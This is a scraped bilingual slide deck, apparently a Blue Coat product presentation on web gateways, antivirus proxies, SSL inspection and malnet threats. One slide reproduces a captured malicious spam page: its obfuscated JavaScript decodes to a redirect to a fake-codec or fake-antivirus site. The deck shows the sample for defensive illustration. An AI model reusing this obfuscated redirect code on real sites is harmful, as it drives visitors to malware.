890 likes | 1.64k Views
BlueCoat products update. BlueCoat Systems. BlueCoat 產品. 網頁安全閘道 – Security ProxySG (Proxy Edition) ProxyAV Content Analysis Syste Malware Analysis Appliance BCWF DLP ProxyClient Reporter Director 廣域網路加速 – Acceleration ProxySG (M5 Edition) ProcyClient Director.
E N D
BlueCoat products update BlueCoat Systems
BlueCoat產品 • 網頁安全閘道 – Security • ProxySG (Proxy Edition) • ProxyAV • Content Analysis Syste • Malware Analysis Appliance • BCWF • DLP • ProxyClient • Reporter • Director • 廣域網路加速 – Acceleration • ProxySG (M5 Edition) • ProcyClient • Director • 應用網路效能管理 - Visibility • PacketShaper • Intelligence Center • Policy Center • ISP快取應用 • CacheFlow • 現代先進的威脅防護 - ATP • Security Analytics Platform(Solera) • SSL Visibility Appliance(Netronome) • Malware Analysis Appliance • Cloud Services • Crossbeam • K9
Business assurance technology Security & PolicyEnforcementCenter MobilityEmpowermentCenter TrustedApplicationsCenter PerformanceCenter ResolutionCenter Web Gateway & Orchestration(SWG) Cloud Mobility Application Management WAN/Video Optimization Case Analyst Workflow SSL Interception Web Gateway Mobile Expander Business Application Enablement Cache optimization Vulnerability Expertise Services Web & Network Protection Mobile Protection Shaping Reporting and Management ATP Suite Blue Coat Advanced Threat Protection ThreatBLADES SSL Visibility Malware Analysis Content Analysis System WebThreat MailThreat FileThreat Custom Analytics Security Analytics Platform by Solera (formerly DeepSee) BusinessAssurance Platform • Cloud • 15,000 Customers • 80M Users • VM, Appliance, X-Beam platforms • 33 Worldwide PoP’s • 84% of Fortune 500, 90% FedGov
Integrated SSL Visibility A Complete and Integrated Portfolio of Modern Advanced Threat Protection Solutions Blue Coat SSL Visibility Appliance Blocking and Prevention Malware Analysis Appliance Blue Coat Malware Analysis Appliance Blue Coat ProxySG Content Analysis System Security Analytics Platform by Solera ThreatBLADES Security Analytics Storage Security Analytics CentralManager Security Analytics Appliances
<script language="javascript"> function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));} </script> Interesting… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <script language="javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); </script> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linuxsuse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: <script> document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169"; </script>
…to launch a Fake Codec attack: You May See Through A Fake AV. But, How About This…
Malnet Entry Point: Social Networking • 1 in 16 malnet attacks come from social networking • 95% of Internet content types contained within social networks • Threat Tactic: Impersonating Friends Social Networking 6.48% Business Impact: Granular application & operation controls are required to effectively manage and mitigate risks of social networking
Anatomy Of A Social Networking Portal Posts From People You Like Posts From Friends Your Friends’ Friends 14 Advertising Content Vendors Advertisers 3rd Party Data Facebook Apps
Social Networking is the New Threat Vector 48 Million Users Attacked In 1 Second
Bluecoat 安全解決方案Web Pulse 雲端演算 Web Anti-Virus 網頁防毒 SSL Proxy 加密流量稽核管控Malware analysis惡意軟件分析
SWG 的安全連線管控– 往外 對外連線管控: 網址過濾及即時網頁分類 (Real-time Rating Service) 支援多種網頁資料庫, 本地資料庫客製化及同時支援3種資料庫同時運作模式 BCWF 提供單一網址多重分類 透過ICAP/ICAPS結合資料外洩防護(DLP)服務 可針對使用者/群組進行認證及授權 可根據使用者/群組, 位置, 服務, 時間, 內容型態等, 進行政策管控 協定存取指令管控 (ex. HTTP_POST, PUT…) 憑證資訊確認(Certificate Validation)管控 (ex. SSL) Internet URL Filtering Method Controls Cert. Validation AAA Policy DLP Checks ProxySG 17
SWG 的安全連線管控–往內 對內連線管控: 透過特徵碼比對, 分析網頁物件所可能潛在的惡意程式 Kaspersky, Sophos, McAfee, Panda 協定識別支援 (Protocol over HTTP Detection) 網頁內容過濾 (attachments, executables, file types, etc.) 資料種類及內容型態比對 (Apparent Data Type & Container Mismatch Detection) Active 控制元件確認檢查 (ex: ActiveX, VB, Java scropt..etc) Internet Malware Detection Data Types Protocol Compliance Content Filters Active Content URL Filtering Method Controls Cert. Validation AAA Policy DLP Checks ProxySG 18
SWG 的管理及效能–全部 支援預設或是客製化的報表紀錄 物件快取(Object Caching) 可大幅提升存取效能 Object Pipelining & Adaptive Refresh patented technologies 頻寬管理(ex. Streaming media) 協定最佳化 (Protocol Optimization) Internet Log Files Reporter Bandwidth Management Object Cache Protocol Optimization Malware Detection Data Types Protocol Compliance Content Filters Active Content URL Filtering Method Controls Cert. Validation AAA Policy DLP Checks ProxySG 19
Babe-of-the-Day http://apps.facebook.com/babe-oftheday/
Playboy on Facebook http://www.facebook.com/playboy/
今日網站型態是複雜的 Reuters Video ESPN Video NGFW / UTM URL Rating Video Video Blue Coat Next Gen Filtering Video & Finance Video & Sports The SAME Value TO BUSINESS?
細微的Web應用控制 • Upload Video • Upload Photo • Post Message • Send Email • Download Attachment • Upload Attachment • Safe Search • Major Engines supported • Media Search engines as well • Keyword Searches • Social Networks • Regulate Operations • Restrict abuse • Multi-media • Publishing • Sharing • Web Mail
Web應用的控制 • VPM support for web application controls • Category, application and operation level controls provided • Infrastructure in place for auto-updating • Dynamic updates of new applications delivered via WebPulse • Requires BCWF license to operate • Application usage reports included UI • Addition reports also available via reporter
Web應用的控制 • Available in WEB Access Layer of VPM • Destination objects created to use in policy for • Request URL Category • Request URL Application • Request URL Operation
Web應用的控制 • Edit An Application Object • All applications listed • Select All or individual apps • Find applications that support an operation • Find applications by name • Selected Applications shown • Give the object a name to more easily identify it
Web應用的控制 • Edit operation object • All operations listed • Select all or individual ops • Find operations by application name • Select operations shown • Name to more easily identify it in policy
Web應用的控制 • Control App and Op • Create new destination object • Select Combined Destination Object • Specify the app “and” op
WebPulse 提供負日防禦機制
Where does malware come from? Everywhere!
Five largest Malnets on the Internet • Infrastructure Scales to Support Varying Number of Attacks
Geographic Distribution of Shnakule CENTRAL ASIA WESTERN EUROPE 0% -54% 98% +4% AMERICAS 42% -22% 6% +3% 0% -1% 5% -4% 1% +1% 3% -57% 37% +32% 90% -2% 37% +17% 33% +6% 1% -5% 40% +37% 67% +58% 17% -1% 1% -2% 3% +3% 0% -2% 18% +1% 0% -9% 2% +2% PORN SEP / RELAY EASTERN EUROPE & MIDDLE EAST EAST/SE ASIA COMMAND & CONTROL SCAMS MALEWARE SERVERS
the negative day defense Negative Day Defense Identifies and Blocks New Components Negative Day Defense Continues to Block Malnet Infrastructure UTM Policy applied AV Engines Begin Detection Active Threat Phase -30 Days 0 Day +1 Days +30 Days Infrastructure Phase New Subnet, IP Address and Host Name Dynamic Payload Changes Domain Exploit Server Attack Begins Attack Ends
Mapping Malnets PORN SEARCH ENGINE POISONING MALVERTISING MOBILE PHISHING Content and encryption doesn’t matter. Zero-day exploits don’t matter. Device type doesn’t matter. Attack type doesn’t matter.
Real World Results:benefit Of Adding Network Based AnTimalware to Secure Web Gateway Global Financial Enterprise- 243.21 Billion attempts to access websites (allowed+blocked) - 793.09 Million attempts to access known malicious sites blocked by WebPulse. - 89,192 Malicious files blocked by network perimeter antimalware12 months ending 4/13. Over 250,000 employees Enterprise Network Internet Network Antimalware Secure Web Gateway
AV部署在Proxy後面的缺點 每個物件都要進行掃描 掃毒引擎將無法負荷 用户將由於時間延遲而重送要求 Data Internal Network Proxy Anti-virus Internet Firewall
AV部署在Proxy前面的問題 新病毒出現,感染的物件在AV病毒碼更新前到達 感染病毒的物件存在快取伺服器中 當AV有新病毒碼更新,但無法通知快取伺服器 病毒繼續透過快取傳播攻擊的窗口顯著擴大 Anti-virus Internal Network Internet Firewall Proxy
Bluecoat ProxyAV 的方案優勢 • 整合多家的掃毒引擎, 提供客戶選擇的多樣性 • 更換掃毒引擎無須更換硬體 • 可平行擴充,投資效益可獲得保障 (ROI) • 掃瞄一次,服務多次,增加效能 • 專精於網頁內容掃描 (80%的惡意程式感染來自於Web) ProxyAV ProxyAV DLP ICAP, ICAP+, S-ICAP Internet Enterprise Network ProxySG
實際使用案例 • A Financial Enterprise Deployment • 20B web requests/month Blue Coat WebPulse™ Removed 9,000 Threats 1.6% Removed 547,000 Threats 98.4% 9,000 Threats Firewall Blue Coat Web Security Clean 556,000 Threats 556,000 Threats Blue Coat ProxySG Blue Coat ProxyAV
SSL 應用的好處 Internet 加密的 SSL 通道透過 443 埠 ASP CorporateNetwork ExternalApps Internal Users 用戶端與伺服器在公共網際網路上建立一個私有、加密、「依需求」建立的連線 44
SSL 壞的一面可能是… 開了另一個後門 網際網路 應用服務供應商 企業網路 %3s*<5y D&7w$=h9o 4g*%2@s W{}77%21 2@/^X!Z:b j5+d#o6 內部使用者 外部應用程式 IT 人員完全「看不到」進出企業網路的流量是什麼 45
SSL IT 人員需要管理的可見度 除了合法的應用程式, SSL 也可能夾帶惡意軟體、竊取機密資訊、未經檢查的流量及非SSL流量提供私密連結 ASP CorporateNetwork Spyware Intellectual Property Worms Phishing Viruses Rogue Apps Business Apps Internet ExternalApps Internal Users 46
Blue Coat:可見度及背景狀況 用戶端 代理器 伺服器 我支援的運算法。 連線請求。 我支援的運算法。 連線請求。 使用這個運算法。 伺服器的數位憑證。 就使用這個運算法。 模擬的憑證。 查證憑證並取出 (代理器的) 公開金鑰。 查證憑證並取出伺服器的公開金鑰。 完成驗證 完成驗證 完成驗證 完成驗證 已建立的通道 已建立的通道 用戶端 – 代理器連線 伺服器 – 代理器連線 47
Security and Policy Enforcement Center:CONTENT ANALYSIS (CAS)MALWARE ANALYSIS (MAA)
Content analysis system CA-S400-A4 CA-S400-A1 CA--S400-A3 CA-S400-A2 Content Analysis System CAS APPLIANCE CAS Appliance500 Mbps CAS Appliance250 Mbps CAS Appliance50 Mbps CAS Appliance100Mbps LICENSE ASingle AV + Whitelist license (by user ) LICENSE BDual AV + Whitelist license (by user ) or CAS SW LICENSE MALWARE ANALYSIS APPLIANCE (Sandbox) or Key Components and Packaging Malware Analysis ApplianceMAA-S500-10 Malware Analysis ApplianceMAA-S400-10 MALWARE ANALYSIS NW LICENSE Annual Subscription and Update Service @ 20% of HW List
Intelligent Defense in Depth Block Known Web Threats ProxySG Block all known sources/malnets and threats before they are on the network Block Known Web Threats ProxySG Allow Known Good Content Analysis System with Application Whitelisting Allow Known Good Content Analysis System with Application Whitelisting Free up resources to focus on advanced threat analysis Block Known Bad Downloads Content Analysis System with Malware Scanning Block Known Bad Downloads Content Analysis System with Malware Scanning Reduce threats for incident containment and resolution Analyze Unknown Threats Malware Analysis Appliance AnalyzeUnknown Threats Malware Analysis Appliance Discover new threats and then update you gateways